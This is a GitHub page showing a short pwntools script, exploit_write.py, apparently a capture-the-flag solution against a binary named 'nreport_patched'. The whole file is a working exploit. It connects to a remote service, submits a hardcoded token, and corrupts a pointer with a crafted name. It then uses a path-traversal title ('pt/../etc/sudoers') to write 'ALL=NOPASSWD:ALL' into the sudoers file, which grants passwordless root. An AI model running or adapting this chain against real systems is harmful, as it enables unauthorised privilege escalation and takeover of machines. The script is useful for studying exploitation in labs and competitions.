-
Notifications
You must be signed in to change notification settings - Fork 12
Expand file tree
/
Copy pathexploit_write.py
More file actions
executable file
·35 lines (22 loc) · 852 Bytes
/
exploit_write.py
File metadata and controls
executable file
·35 lines (22 loc) · 852 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python3
from pwn import context, log, p64, remote, sys
context.binary = 'nreport_patched'
def main():
token = b'hD]AAAAAAVAAAT'
if len(sys.argv) != 3:
log.error(f'Usage: {sys.argv[0]} <ip> <port>')
host, port = sys.argv[1], sys.argv[2]
p = remote(host, int(port))
p.sendlineafter(b'Enter Your Token: ', token)
p.sendlineafter(b'Enter Name: ', p64(context.binary.sym.userinfo1 + 140 + 2))
p.sendlineafter(b'> ', b'1')
p.sendlineafter(b'Message Title: ', b'ALL=NOPASSWD:ALL')
p.sendlineafter(b'Message: ', b'user')
p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'Enter number to edit: ', b'12')
p.sendlineafter(b'Message Title: ', b'pt/../etc/sudoers')
p.sendlineafter(b'> ', b'4')
p.sendlineafter(b'> ', b'2')
p.close()
if __name__ == '__main__':
main()